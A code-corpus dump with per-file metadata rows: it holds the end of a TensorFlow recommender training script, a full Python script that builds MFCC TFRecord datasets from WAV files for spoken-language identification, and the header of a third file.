att_o = tf.expand_dims(tf.nn.softmax(tf.reduce_sum(att_o * att_x, 2)), -1)
vote_ret = tf.reduce_sum(att_o * votes, axis = 1)
fc = tf.compat.v1.layers.dropout(tf.compat.v1.layers.dense(vote_ret, vote_ret.get_shape().as_list()[-1]/2, activation=tf.nn.relu),
rate = pd['dropout'],
training = g_training)
self.output = tf.compat.v1.layers.dense(fc, 1, activation=tf.nn.relu)
#call for evaluation
def predict(self, sess, ph_dict):
return sess.run(self.output, feed_dict={self.sph_user : ph_dict['user'],
self.sph_doc : ph_dict['doc'],
self.sph_con : ph_dict['con'],
self.sph_seed : ph_dict['seed'],
self.sph_ig : ph_dict['ig'],
self.ph_dwell_time : ph_dict['reward']})
#call for learning from data
def learn(self, sess, ph_dict):
loss, _ = sess.run([self.loss, self.opt], feed_dict={self.sph_user : ph_dict['user'],
self.sph_doc : ph_dict['doc'],
self.sph_con : ph_dict['con'],
self.sph_seed : ph_dict['seed'],
self.sph_ig : ph_dict['ig'],
self.ph_dwell_time : ph_dict['reward']})
global g_loss_sum, g_loss_cnt
g_loss_sum += np.mean(loss)
g_loss_cnt += 1
def sigmoid(x):
return 1.0 / (1.0 + math.exp(max(min(-x, 1e2), -1e2)))
def handle(sess, net, sess_data):
def gen_sparse_tensor(fs):
global g_dr
kk, vv = [], []
for i in range(len(fs)):
ff = fs[i]
assert(isinstance(ff, set))
ff = list(ff)
for k in range(len(ff)):
kk.append(np.array([i, k], dtype=np.int32))
vv.append(ff[k])
return tf.compat.v1.SparseTensorValue(kk, vv, [len(fs), g_dr.unique_feature_num()])
if len(sess_data) != pd['batch_size']:
return
user, doc, con, seed, dwell = [], [], [], [], []
for i in range(len(sess_data)):
user.append(sess_data[i][0])
doc.append(sess_data[i][1])
con.append(sess_data[i][2])
seed.append(sess_data[i][3])
dwell.append(sess_data[i][4])
phd = {}
#print np.array(user).shape
user = np.array(user).reshape(pd['batch_size']*pd['user_field_num'])
phd['user'] = gen_sparse_tensor(user)
doc = np.array(doc).reshape(pd['batch_size']*pd['doc_field_num'])
phd['doc'] = gen_sparse_tensor(doc)
seed = np.array(seed).reshape(pd['batch_size']*pd['doc_field_num'])
phd['seed'] = gen_sparse_tensor(seed)
ig = []
for i in range(doc.shape[0]):
ig.append({0} if doc[i] <= seed[i] else doc[i] - seed[i])
ig = np.array(ig).reshape(pd['batch_size']*pd['doc_field_num'])
phd['ig'] = gen_sparse_tensor(ig)
con = np.array(con).reshape(pd['batch_size']*pd['con_field_num'])
phd['con'] = gen_sparse_tensor(con)
phd['reward'] = dwell
global g_training
if g_training:
#train network
net.learn(sess, phd)
else:
#evaluate network
qout = net.predict(sess, phd).reshape([-1])
global g_working_mode
for i in range(len(dwell)):
if 'local_predict' == g_working_mode:
print('%s %s' % (dwell[i], qout[i]))
def work():
sess = tf.compat.v1.Session()
#build networks
net = ItemRecommender()
saver = tf.compat.v1.train.Saver(max_to_keep=1)
g_init_op = tf.compat.v1.global_variables_initializer()
if os.path.exists('./ckpt') and len(os.listdir('./ckpt')):
model_file = tf.train.latest_checkpoint('./ckpt')
saver.restore(sess, model_file)
else:
sess.run(g_init_op)
os.system('mkdir ckpt')
global g_loss_sum, g_loss_cnt, g_dr
last_epoch_loss = 1e2
for k in range(pd['num_epochs']):
if k > 0:
g_dr.load('sample.data')
data = g_dr.next()
batch_cnt = 0
while data is not None:
handle(sess, net, data)
data = g_dr.next()
batch_cnt += 1
if g_training and batch_cnt % 10 == 0:
print('>>>Average Loss --- epoch %d --- batch %d --- %f' % (k, batch_cnt, g_loss_sum / (g_loss_cnt + 1e-6)))
print('>>>Average Loss --- epoch %d --- batch %d --- %f' % (k, batch_cnt, g_loss_sum / (g_loss_cnt + 1e-6)))
if g_loss_sum / g_loss_cnt > last_epoch_loss:
print('Job Finished!')
break
else:
last_epoch_loss = g_loss_sum / g_loss_cnt
saver.save(sess, 'ckpt/m3oe.ckpt')
if __name__ == '__main__':
g_dr.load('sample.data')
if g_working_mode == 'local_train':
g_training = True
elif g_working_mode == 'local_predict':
g_training = False
else:
raise Exception('invalid working mode')
work()
| 48.896414 | 142 | 0.547869 |
b7f00dce471a6f794f56174339f75e9015bea098
| 29,523 |
py
|
Python
|
python/en/archive/dropbox/ec2-oregon/make_tfrecord.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/ec2-oregon/make_tfrecord.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/ec2-oregon/make_tfrecord.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
make_tfrecord.py
"""
import os
import sys
import numpy as np
import tensorflow as tf
import resampy
import pickle
import librosa
import datetime
from scipy.io import wavfile
from python_speech_features import mfcc
LANGUAGE_LABELS = {'english':0, 'korean':1, 'japanese':2, 'chinese':3, 'spanish':4, 'french':5, 'german':6, 'italian':7}
class multi_print():
def __init__(self, stdouts, orig_stdout):
self.stdouts = stdouts
self.orig_stdout = orig_stdout
def __call__(self, sentence, end='\n'):
for _stdout in self.stdouts:
sys.stdout = _stdout
print(sentence, flush=True, end=end)
sys.stdout = self.orig_stdout
class MakeTFRecord():
def __init__(self, sampling_rate, window_size, window_step, t_min, t_max, n_features,
data_path_tr_val, meta_path_tr_val, n_tot_data_tr_val, valid_rate,
data_path_test, meta_path_test, n_tot_data_test,
tfr_path, tfr_path_trn, tfr_path_val, tfr_path_test, tfr_path_info,
overwrite_tr_val=False, overwrite_test=False,
multi_print=print):
self.window_size = window_size
self.window_step = window_step
self.data_min_time = t_min
self.data_max_time = t_max
self.n_features = n_features
self.valid_rate = valid_rate
self.fs = sampling_rate
self.data_path_tr_val = data_path_tr_val
self.meta_path_tr_val = meta_path_tr_val
self.n_tot_data_tr_val = n_tot_data_tr_val
self.data_path_test = data_path_test
self.meta_path_test = meta_path_test
self.n_tot_data_test = n_tot_data_test
self.tfr_path = tfr_path
self.tfr_path_trn = tfr_path_trn
self.tfr_path_val = tfr_path_val
self.tfr_path_test = tfr_path_test
self.tfr_path_info = tfr_path_info
self.overwrite_tr_val = overwrite_tr_val
self.overwrite_test = overwrite_test
self.n_aug = 0
self.feat_mean_set = []
self.feat_std_set = []
self.feat_mean_set_aug = []
self.feat_std_set_aug = []
self.available_aug_idx = []
self.mprint = multi_print
self.label_in_dataset = []
self.make_trn_val_data = False
self.make_test_data = False
def make_trn_val_tfrecord(self):
if os.path.exists(self.tfr_path_trn) and os.path.exists(self.tfr_path_val) and not self.overwrite_tr_val:
self.mprint(Warning('Train, Validation TFRecord is already exists.\nTrain path: %s\nValid path: %s'%(self.tfr_path_trn, self.tfr_path_val)))
else:
if self.overwrite_tr_val:
self.mprint('[WARNING] Overwriting train, validation dataset')
if not len(self.n_tot_data_tr_val) == len(self.meta_path_tr_val):
self.mprint('# of dataset != # of meta dir, dataset:%d, meta dir:%d'
%(len(self.meta_path_tr_val), len(self.n_tot_data_tr_val)))
self.n_tot_data_tr_val = [self.n_tot_data_tr_val[0]]*len(self.meta_path_tr_val)
file_paths, labels, data_shape, valid_idx, error_msg = self.load_files(self.data_path_tr_val,
self.meta_path_tr_val,
self.n_tot_data_tr_val,
'Train, Valid')
valid_file_paths = np.array(file_paths)[valid_idx]
valid_labels = np.array(labels)[valid_idx]
valid_data_shape = np.array(data_shape)[valid_idx]
trn_file_paths = np.delete(file_paths, valid_idx, axis=0)
trn_labels = np.delete(labels, valid_idx, axis=0)
trn_data_shape = np.delete(data_shape, valid_idx, axis=0)
# 이 부분에 있는 shuffle_idx 관련된 내용은 지워도 될듯
shuffle_idx = np.random.choice(len(trn_file_paths), size=len(trn_file_paths), replace=False)
# 이 밑으로는 다 필요
self.trn_file_paths = np.array(trn_file_paths)[shuffle_idx]
self.trn_labels = np.array(trn_labels)[shuffle_idx]
self.trn_data_shape = np.array(trn_data_shape)[shuffle_idx]
assert len(self.trn_file_paths) == len(self.trn_labels) == len(self.trn_data_shape), \
'not equal: %s, %s, %s'%(len(self.trn_file_paths), len(self.trn_labels), len(self.trn_data_shape))
# 이 부분에 있는 shuffle_idx 관련된 내용은 지워도 될듯
shuffle_idx = np.random.choice(len(valid_file_paths), size=len(valid_file_paths), replace=False)
# 이 밑으로는 다 필요
self.valid_file_paths = np.array(valid_file_paths)[shuffle_idx]
self.valid_labels = np.array(valid_labels)[shuffle_idx]
self.valid_data_shape = np.array(valid_data_shape)[shuffle_idx]
assert len(self.valid_file_paths) == len(self.valid_labels) == len(self.valid_data_shape), \
'not equal: %s, %s, %s'%(len(self.valid_file_paths), len(self.valid_labels), len(self.valid_data_shape))
self.mprint('trn dataset: %d, validation dataset: %d'
%(len(self.trn_file_paths), len(self.valid_file_paths)))
save_txt_path = os.path.join(self.tfr_path, 'trn_data_list.txt')
self.save_txt(save_txt_path, "\n".join(self.trn_file_paths[:]), 'Save train data list in %s' %(save_txt_path))
save_txt_path = os.path.join(self.tfr_path, 'trn_data_label_list.txt')
self.save_txt(save_txt_path, "\n".join(np.array(self.trn_labels[:], dtype=np.str)), 'Save train data label list in %s' %(save_txt_path))
save_txt_path = os.path.join(self.tfr_path, 'val_data_list.txt')
self.save_txt(save_txt_path, "\n".join(self.valid_file_paths[:]), 'Save validation data list in %s' %(save_txt_path))
if not len(error_msg) == 0:
save_txt_path = os.path.join(self.tfr_path, 'data_error_msg_trn_val.txt')
self.save_txt(save_txt_path, "\n".join(error_msg), 'Save error msg for trn/valid dataset in %s' %(save_txt_path))
self.make_tfrecord(self.tfr_path_trn, self.trn_file_paths, self.trn_labels, mode='Train')
self.make_tfrecord(self.tfr_path_val, self.valid_file_paths, self.valid_labels, mode='Valid')
self.trn_mean = np.mean(self.feat_mean_set, axis=0)
self.trn_std = np.std(self.feat_std_set, axis=0)
self.n_trn = len(self.trn_file_paths)
self.n_valid = len(self.valid_file_paths)
self.make_trn_val_data = True
# 여기까지 함...
def make_test_tfrecord(self):
if os.path.exists(self.tfr_path_test) and not self.overwrite_test:
self.mprint(Warning('Test TFRecord is already exists.\nTest path: %s\n'
%(self.tfr_path_test)))
else:
if self.overwrite_test:
self.mprint('[WARNING] Overwriting test dataset')
if not len(self.n_tot_data_test) == len(self.meta_path_test):
self.mprint('# of dataset != # of meta dir, dataset:%d, meta dir:%d'
%(len(self.meta_path_test), len(self.n_tot_data_test)))
self.n_tot_data_test = [self.n_tot_data_test[0]]*len(self.meta_path_test)
file_paths, labels, data_shape, _, error_msg = self.load_files(self.data_path_test,
self.meta_path_test,
self.n_tot_data_test,
'Test')
shuffle_idx = np.random.choice(len(file_paths), size=len(file_paths), replace=False)
self.test_file_paths = np.array(file_paths)[shuffle_idx]
self.test_labels = np.array(labels)[shuffle_idx]
self.test_data_shape = np.array(data_shape)[shuffle_idx]
if not len(error_msg) == 0:
save_txt_path = os.path.join(self.tfr_path, 'data_error_msg_test.txt')
self.save_txt(save_txt_path, "\n".join(error_msg),
'Save error msg for test dataset in %s' %(save_txt_path))
self.make_tfrecord(self.tfr_path_test, self.test_file_paths, self.test_labels, mode='test')
label2language = [key for label in self.test_labels for key, val in LANGUAGE_LABELS.items() if label == val]
testdata_language = np.unique(label2language)
self.n_test = len(self.test_file_paths)
for language in testdata_language:
self.mprint('# of test dataset: %d, language: %s'
%(int(np.sum(np.array(label2language)==language)), language))
self.make_test_data = True
def make_augment_tfrecord(self, tfr_path_aug, aug_type='wn', aug_rate=1, overwrite_aug=False):
self.aug_type = aug_type
self.aug_rate = aug_rate
if os.path.exists(tfr_path_aug) and not overwrite_aug:
self.mprint(Warning('Augmentation TFRecord is already exists.\nAugmentation path: %s'
%(tfr_path_aug)))
else:
if overwrite_aug:
self.mprint('[WARNING] Overwriting augmented dataset')
if not self.make_trn_val_data:
saved_txt_path = os.path.join(self.tfr_path, 'trn_data_list.txt')
self.trn_file_paths = self.read_txt(saved_txt_path, 'Load train data list from %s' %(saved_txt_path))
saved_txt_path = os.path.join(self.tfr_path, 'trn_data_label_list.txt')
self.trn_labels = self.read_txt(saved_txt_path, 'Load train data label list from %s' %(saved_txt_path))
if not type(self.trn_labels[0]) == int:
self.trn_labels = np.array(self.trn_labels, dtype=np.int16)
with open(self.tfr_path_info, 'rb') as f:
_data_info = pickle.load(f)
self.trn_data_shape = _data_info['trn_data_shape']
self.make_tfrecord(tfr_path_aug, self.trn_file_paths, self.trn_labels, 'Augmentation')
self.trn_aug_data_shape = self.trn_data_shape[np.array(self.available_aug_idx)]
self.trn_aug_mean = np.mean(self.feat_mean_set_aug, axis=0)
self.trn_aug_std = np.std(self.feat_std_set_aug, axis=0)
def load_files(self, data_path, meta_path, n_data, mode=None):
file_paths, file_labels, data_shape, file_info, error_msg= [],[],[],[],[]
self.mprint('%s data checking..' %mode)
for _idx, _meta_path in enumerate(meta_path):
_file_paths, _file_labels, _data_shape = [],[],[]
_len_error_msg = len(error_msg)
_len_file_paths = len(file_paths)
_dataset_name = os.path.basename(_meta_path).split('.txt')[0]
_file_dir = os.path.join(data_path, _dataset_name)
_language = _dataset_name.split('_')[0]
if not mode == 'Test':
_label_check = LANGUAGE_LABELS[_language]
self.label_in_dataset.append(_label_check)
with open(_meta_path, 'r') as f:
_meta_data = f.read().splitlines()
self.mprint('[%s] Load meta data from %s and data from %s'
%(_language, _dataset_name, _file_dir))
np.random.shuffle(_meta_data)
_data_len_check = len(_meta_data) >= n_data[_idx]
_max_len = n_data[_idx] if _data_len_check else len(_meta_data)
progress = Progress(_max_len, 20)
while len(_file_paths) < _max_len:
try:
_fname, _label = _meta_data.pop().split(" ")
if not mode == 'Test':
assert int(_label) == _label_check, \
"label of %s is %d, but data is labeled as %d" \
%(_file_paths, _label_check, int(_label))
else:
assert int(_label) in self.label_in_dataset, \
"label of %s is %d, but train dataset is only available %s" \
%(_file_paths, int(_label), self.label_in_dataset)
except:
break
_file_path = os.path.join(_file_dir, _fname)
_fs, _wav_data = wavfile.read(_file_path)
if not _fs == self.fs:
_wav_data = resampy.resample(_wav_data, _fs, self.fs)
error_msg.append('[(Warning) Sampling rate error] Sampling Rate is required 16kHz, file: %s has %dHz' \
%(_file_path, _fs))
if not mode == 'Test':
_check_result = self.data_check(_wav_data, _file_path, error_msg)
# 학습 단계에서는 data를 확인하고 학습 데이터에 포함
else:
_check_result = True
# 테스트 단계에서는 모든 data를 포함
if _check_result:
_file_paths.append(_file_path)
_data_shape.append([len(_wav_data)/_fs, self.window_size*_fs, int(_label)])
_file_labels.append(int(_label))
# text file에 저장할 때는, 0, 0.25, 0.50, 0.75, 1.0일때만 progress bar를 text파일에 저장함.
# 이것이 필요한 이유는 text파일의 경우, new line으로 넘어가서 이렇게 저장횟수를 제한함.
if len(_file_paths) == 1 or len(_file_paths) == int(_max_len*0.25) or len(_file_paths) == int(_max_len*0.5) or len(_file_paths) == int(_max_len*0.75) or len(_file_paths) == int(_max_len-1):
progress(_dataset_name, len(_file_paths), len(error_msg)-_len_error_msg, _print=self.mprint)
# cmd line임.
else:
progress(_dataset_name, len(_file_paths), len(error_msg)-_len_error_msg)
# end of while
if not len(_file_paths) == _max_len:
self.mprint(' Expected: %d, but get: %d' %(_max_len, len(_file_paths)))
if mode == 'Train, Valid':
_n_valid = int(len(_file_paths) * self.valid_rate)
# _len_file_paths이 지금은 0인데 왜 있는지 잘 모르겠음...
# 중요: tr vs. val data를 randomize하는데... 전체 데이터에 대해서가 아니라, 각 dataset에 대해 80:20으로 나누기 위해서.
# _len_file_paths 로 offset을 해준다.
_valid_idx = np.random.choice(len(_file_paths), size=_n_valid, replace=False) + _len_file_paths # validation dataset index
file_info.extend(_valid_idx)
file_paths.extend(_file_paths)
file_labels.extend(_file_labels)
data_shape.extend(_data_shape)
# end of for
return file_paths, file_labels, data_shape, file_info, error_msg
def data_check(self, _wav_data, _file_path, _error_msg):
_rec_time = len(_wav_data)/self.fs
if not _wav_data.dtype == np.int16:
_error_msg.append('[Bits] wavfile is %s \n' %(type(_wav_data)))
return False
if not 50 < np.std(_wav_data):
_error_msg.append('[Silence] mean: %.3f, std: %.3f check %s \n' \
%(np.mean(_wav_data), np.std(_wav_data), _file_path))
return False
if _rec_time < self.data_min_time:
_error_msg.append('[Minimum recording time] Recording time of %s is too short, %.3f \n' \
%(_file_path, _rec_time))
return False
if _rec_time > self.data_max_time:
_error_msg.append('[Maximum recording time] Recording time of %s is too long, %.3f \n' \
%(_file_path, _rec_time))
return False
return True
def make_tfrecord(self, tfr_path, file_path, labels, mode=None):
dataset = zip(file_path, labels)
options = tf.python_io.TFRecordOptions(compression_type=tf.python_io.TFRecordCompressionType.GZIP)
writer = tf.python_io.TFRecordWriter(path=tfr_path, options=options)
self.mprint('[%s] Make TFRecord files..' %mode)
_max_progress = len(file_path)
progress = Progress(_max_progress, 20)
for _idx, (_file_path, _label) in enumerate(dataset):
_fs, _wav_data = wavfile.read(_file_path)
if not _fs == self.fs:
_wav_data = resampy.resample(_wav_data, _fs, self.fs)
if mode == 'Augmentation':
_error_msg = [] # not use
if self.aug_type == 'wn':
aug = self.adding_white_noise
elif self.aug_type == 'stretch':
aug = self.stretching
_wav_data = aug(_wav_data, _fs, self.aug_rate) # 0.01 ~ 0.005
_data_check = self.data_check(_wav_data, _file_path, _error_msg)
if _data_check:
_splited_data, _seq_length = self.split_frame(_wav_data, _fs, winfunc=np.hamming)
_feat_data, _mfcc_seq_length = self.mfcc_extractor(_wav_data, _fs)
assert _seq_length == _mfcc_seq_length, \
'calculated sequence length: %d, mfcc sequence length: %d, check: %s' \
%(_seq_length, _mfcc_seq_length, _file_path)
self.write_sequence_tfrecords(writer, _wav_data, _splited_data, _feat_data, _label, _seq_length)
self.n_aug += 1
self.available_aug_idx.append(_idx)
self.feat_mean_set_aug.append(np.mean(_feat_data, axis=0))
self.feat_std_set_aug.append(np.std(_feat_data, axis=0))
else:
_splited_data, _seq_length = self.split_frame(_wav_data, _fs, winfunc=np.hamming)
_feat_data, _mfcc_seq_length = self.mfcc_extractor(_wav_data, _fs)
assert _seq_length == _mfcc_seq_length, \
'calculated sequence length: %d, mfcc sequence length: %d, check: %s' \
%(_seq_length, _mfcc_seq_length, _file_path)
self.write_sequence_tfrecords(writer, _wav_data, _splited_data, _feat_data, _label, _seq_length)
if mode == 'Train':
self.feat_mean_set.append(np.mean(_feat_data, axis=0))
self.feat_std_set.append(np.std(_feat_data, axis=0))
if _idx == 0 or _idx == int(_max_progress*0.25) or _idx == int(_max_progress*0.5) or _idx == int(_max_progress*0.75) or _idx == int(_max_progress-1):
progress('%s' %mode, _idx+1, _print=self.mprint)
else:
progress('%s' %mode, _idx+1)
writer.close()
def write_sequence_tfrecords(self, writer, wav_data, raw_data, feat_data, label, seq_len):
_wav_data = np.array(wav_data).tostring()
_raw_data = np.array(raw_data).tostring()
_feat_data = np.array(feat_data).tostring()
example_sequence = tf.train.SequenceExample()
example_sequence.context.feature['label'].int64_list.value.append(label)
example_sequence.context.feature['sequence_length'].int64_list.value.append(seq_len)
fl_wav_data = example_sequence.feature_lists.feature_list['wav_data']
fl_raw_data = example_sequence.feature_lists.feature_list['raw_data']
fl_feat_data = example_sequence.feature_lists.feature_list['feat_data']
fl_wav_data.feature.add().bytes_list.value.append(_wav_data)
fl_raw_data.feature.add().bytes_list.value.append(_raw_data)
fl_feat_data.feature.add().bytes_list.value.append(_feat_data)
writer.write(example_sequence.SerializeToString())
def mfcc_extractor(self, _wav_data, _fs):
_mfcc_data = list(mfcc(_wav_data, self.fs, numcep=self.n_features, nfilt=self.n_features, winlen=self.window_size, winstep=self.window_step, winfunc=np.hamming))
assert np.shape(_mfcc_data)[1] == self.n_features
_seq_length = np.shape(_mfcc_data)[0]
return _mfcc_data, _seq_length
def split_frame(self, _wav_data, _fs, winfunc=lambda x:np.ones((x,))):
slen = len(_wav_data)
frame_len = int(self.window_size*self.fs)
frame_step = int(self.window_step*self.fs)
if slen <= frame_len:
numframes = 1
else:
numframes = 1 + int(np.ceil((1.0*slen - frame_len)/frame_step))
padlen = int((numframes-1)*frame_step + frame_len)
zeros = np.zeros((padlen - slen,))
padsignal = np.concatenate((_wav_data, zeros))
indices = np.tile(np.arange(0, frame_len),(numframes,1)) + np.tile(np.arange(0,numframes*frame_step,frame_step),(frame_len,1)).T
indices = np.array(indices, dtype=np.int32)
frames = padsignal[indices]
win = np.tile(winfunc(frame_len),(numframes,1))
new_frames = frames*win
_seq_length = len(new_frames)
return new_frames, _seq_length
def adding_white_noise(self, data, fs, rate): # 0.001 ~ 0.005
_data = data / 32768.0
wn = np.random.randn(len(data))
data_wn = np.int16((_data + rate*wn) * 32768.0)
return data_wn
def stretching(self, data, fs, rate): # 0.8, 0.9, 1.1, 1.2
_data = data / 32768.0
data_stretching = np.int16(librosa.effects.time_stretch(_data, rate) * 32768.0)
return data_stretching
def save_txt(self, path, data, print_msg=None):
if not print_msg == None:
self.mprint(print_msg)
with open(path, 'wt') as f:
f.writelines(data)
def read_txt(self, path, print_msg=None):
if not print_msg == None:
self.mprint(print_msg)
with open(path, 'rt') as f:
data = f.read().splitlines()
return data
class Progress():
def __init__(self, max_iter, _max_bar=50):
self.max_iter = max_iter
self.max_bar = _max_bar
self.iter_digit = int(np.log10(max_iter))+1
def __call__(self, language, current_iter, n_error_file=None, _print=sys.stdout.write):
step = int(round(current_iter/self.max_iter * self.max_bar))
percent = current_iter/self.max_iter* 100
bar = '%8.3f%% |' %percent + '#' * step + ' ' * (self.max_bar - step) + '|'
if not n_error_file == None:
_print(('\r[%s] [%'+'%dd]'%self.iter_digit + '%s [# of error file: %d]') %(language, current_iter, bar, n_error_file))
else:
_print(('\r[%s] [%'+'%dd]'%self.iter_digit + '%s') %(language, current_iter, bar))
if self.max_iter == current_iter:
_print('\n')
# sys.stdout.flush()
if __name__ == "__main__":
flags = tf.app.flags
flags.DEFINE_string("data_dir", "/home/taehwan/Documents/Data/Speech/voxforge/data", "Traing dataset directory.")
flags.DEFINE_string("dataset", "english_giga,korean_giga", "Dataset name.")
flags.DEFINE_string("datatype", "wavfiles", "Type of dataset. default: wavfiles")
flags.DEFINE_string("dataset_test", "english_LCD,korean_LCD", "Dataset for test")
flags.DEFINE_string('tfr_dir_name', 'tfrecord', "Directory of TFRecord files.")
flags.DEFINE_string("n_trn_data", '100', "Total number of training and validation data. default: 100")
flags.DEFINE_string("n_test_data", '10', "Number of maximum test data. If test dataset is less than maximum test data, then use all test dataset during testing phase. default: 10")
flags.DEFINE_bool('data_aug', False, "Data augmentation")
flags.DEFINE_string('aug_type', 'stretch', 'Augmentation type. wn, stretch')
flags.DEFINE_float('aug_rate', 1.1, 'Augmentation rate. Recommand: [0.01, 0.008, 0.005] for wn, [0.8, 0.9, 1.1, 1.2] for stretch ')
flags.DEFINE_float('window_size', 0.025, 'Window size for each frame')
flags.DEFINE_float('window_step', 0.01, 'Window step')
flags.DEFINE_integer('fs', 16000, 'Sampling rate of wavfiles')
flags.DEFINE_float('T_min', 0.5, 'Minimum time of wavfile')
flags.DEFINE_float('T_max', 10, 'Maximum time of wavfile')
flags.DEFINE_float('valid_rate', 0.2, 'Rate of Validation data. n_trn_data*valid_rate: number of validation dataset')
flags.DEFINE_integer('n_mfcc_feat', 26, 'Feature dimensions of MFCC. default: 26(maximum)')
flags.DEFINE_bool('overwrite', False, "Overwrite train/valid tfrecord")
flags.DEFINE_bool('overwrite_test', False, "Overwrite test tfrecord")
flags.DEFINE_bool('overwrite_aug', False, "Overwrite augmentation tfrecord")
flags.DEFINE_string('add_log', '', 'Add someting to TFRecord directory name')
conf = flags.FLAGS
dataset = conf.dataset.replace(" ", "").split(',')
dataset_char = "".join(['%c' %i[0] for i in dataset])
dataset_test = conf.dataset_test.replace(" ", "").split(',')
dataset_type = conf.datatype
T_min = conf.T_min
T_max = conf.T_max
n_features = conf.n_mfcc_feat
data_dir = os.path.join(conf.data_dir, dataset_type)
meta_dir = [os.path.join(conf.data_dir, 'meta', '%s.txt' %(_data)) for _data in dataset]
n_trn_data = [int(_val) for _val in conf.n_trn_data.replace(" ", "").split(',')]
n_test_data = [int(_val) for _val in conf.n_test_data.replace(" ", "").split(',')]
n_class = len(np.unique([LANGUAGE_LABELS[_dataset.split('_')[0]] for _dataset in dataset]))
valid_rate = conf.valid_rate
sampling_rate = conf.fs
window_size = conf.window_size
window_step = conf.window_step
augmentation = conf.data_aug
aug_type = conf.aug_type
aug_rate = conf.aug_rate
overwrite_tr_val = conf.overwrite
overwrite_test = conf.overwrite_test
overwrite_aug = conf.overwrite_aug
LOG_DIR = 'log/%s/%s' %(dataset_char, dataset_type)
tfrecord_info = os.path.join(dataset_char, 'min_%.1f_max_%.1f_winsize_%s_winstep_%s_ndata_%d'%(T_min, T_max, window_size, window_step, n_trn_data[0]))
if not conf.add_log == '':
tfrecord_info += '_%s' %conf.add_log
tfrecord_path = os.path.join(conf.data_dir, conf.tfr_dir_name, tfrecord_info)
if not os.path.exists(tfrecord_path):
os.makedirs(tfrecord_path)
tfrecord_path_trn = os.path.join(tfrecord_path, 'raw_mfcc_trn.tfrecords')
tfrecord_path_valid = os.path.join(tfrecord_path, 'raw_mfcc_val.tfrecords')
tfrecord_path_test = os.path.join(tfrecord_path, 'raw_mfcc_test.tfrecords')
tfrecord_path_aug = os.path.join(tfrecord_path, 'raw_mfcc_trn_aug_%s_%s.tfrecords'%(aug_type, aug_rate))
meta_dir_test = [os.path.join(conf.data_dir, 'meta', '%s.txt' %(_data)) for _data in dataset_test]
tfrecord_path_info = os.path.join(tfrecord_path, 'dataset_info.pkl')
orig_stdout = sys.stdout
date = datetime.datetime.now().strftime('%Y%m%d_%H:%M')
txt_stdout = open(tfrecord_path + '/history_%s.txt'%date, 'wt')
_stdouts = [orig_stdout, txt_stdout]
mprint = multi_print(_stdouts, orig_stdout)
config_keys = [key for key in conf]
config_keys.sort()
for key in config_keys:
mprint('%s: %s' %(key, conf[key].value))
record = MakeTFRecord(sampling_rate, window_size, window_step, T_min, T_max, n_features,
data_dir, meta_dir, n_trn_data, valid_rate,
data_dir, meta_dir_test, n_test_data,
tfrecord_path, tfrecord_path_trn, tfrecord_path_valid, tfrecord_path_test, tfrecord_path_info,
overwrite_tr_val, overwrite_test,
mprint)
if not os.path.exists(tfrecord_path_info) or not os.path.exists(tfrecord_path_trn) or not os.path.exists(tfrecord_path_valid) or overwrite_tr_val:
record.make_trn_val_tfrecord()
DATA_INFO = dict()
for key in conf:
DATA_INFO[key] = conf[key].value if not key in ['dataset', 'dataset_test'] else conf[key].value.replace(" ", "").split(',')
DATA_INFO['LANGUAGE_LABELS'] = LANGUAGE_LABELS
DATA_INFO['LOG_DIR'] = LOG_DIR
DATA_INFO['n_class'] = n_class
DATA_INFO['n_trn'] = record.n_trn
DATA_INFO['n_valid'] = record.n_valid
DATA_INFO['label_in_dataset'] = np.unique(record.label_in_dataset)
DATA_INFO['trn_data_shape'] = record.trn_data_shape
DATA_INFO['valid_data_shape'] = record.valid_data_shape
DATA_INFO['trn_mean'] = record.trn_mean
DATA_INFO['trn_std'] = record.trn_std
DATA_INFO['tfrecord_path_trn'] = tfrecord_path_trn
DATA_INFO['tfrecord_path_valid'] = tfrecord_path_valid
with open(tfrecord_path_info, 'wb') as f:
pickle.dump(DATA_INFO, f)
else:
mprint('Do not make the tfrecord files for train/valid')
if not os.path.exists(tfrecord_path_test) or overwrite_test:
if not record.make_trn_val_data:
with open(tfrecord_path_info, 'rb') as f:
DATA_INFO = pickle.load(f)
record.label_in_dataset = DATA_INFO['label_in_dataset']
record.make_test_tfrecord()
DATA_INFO['n_test'] = record.n_test
DATA_INFO['tfrecord_path_test'] = tfrecord_path_test
DATA_INFO['dataset_test'] = conf['dataset_test'].value.replace(" ", "").split(',')
with open(tfrecord_path_info, 'wb') as f:
pickle.dump(DATA_INFO, f)
else:
mprint('Do not make the tfrecord files for test')
if augmentation:
if not os.path.exists(tfrecord_path_aug) or overwrite_aug:
record.make_augment_tfrecord(tfrecord_path_aug, aug_type=aug_type, aug_rate=aug_rate, overwrite_aug=overwrite_aug)
with open(tfrecord_path_info, 'rb') as f:
DATA_INFO = pickle.load(f)
_backup_name = 'dataset_info_backup_before_%s_%s.pkl'%(aug_type, aug_rate)
os.rename(tfrecord_path_info, os.path.join(tfrecord_path, _backup_name))
DATA_INFO['n_aug_%s_%s'%(aug_type, aug_rate)] = record.n_aug
DATA_INFO['tfrecord_path_trn_aug_%s_%s'%(aug_type, aug_rate)] = tfrecord_path_aug
DATA_INFO['trn_aug_%s_%s_mean'%(aug_type, aug_rate)] = record.trn_aug_mean
DATA_INFO['trn_aug_%s_%s_std'%(aug_type, aug_rate)] = record.trn_aug_std
DATA_INFO['trn_aug_data_shape_%s_%s'%(aug_type, aug_rate)] = record.trn_aug_data_shape
with open(tfrecord_path_info, 'wb') as f:
pickle.dump(DATA_INFO, f)
else:
mprint('Do not make the tfrecord files for augmentation')
mprint('Make TFRecord is finished.')
else:
raise ImportError('Wrong access. This script is for only making tfrecord.')
| 35.356886 | 198 | 0.644481 |
4d06499f67927b33b3dce5134bef5307a00b5961
| 2,725 |
py
|
Python
|
main.py
|
ACBob/pronouns
|
1b5d4c171448c0f5ea55bd6d507b06b897178fc5
|
[
"WTFPL",
"MIT"
] | 2 |
2021-09-06T19:22:27.000Z
|
2021-11-14T20:02:59.000Z
|
main.py
|
ACBob/pronouns
|
1b5d4c171448c0f5ea55bd6d507b06b897178fc5
|
[
"WTFPL",
"MIT"
] | null | null | null |
main.py
|
ACBob/pronouns
|
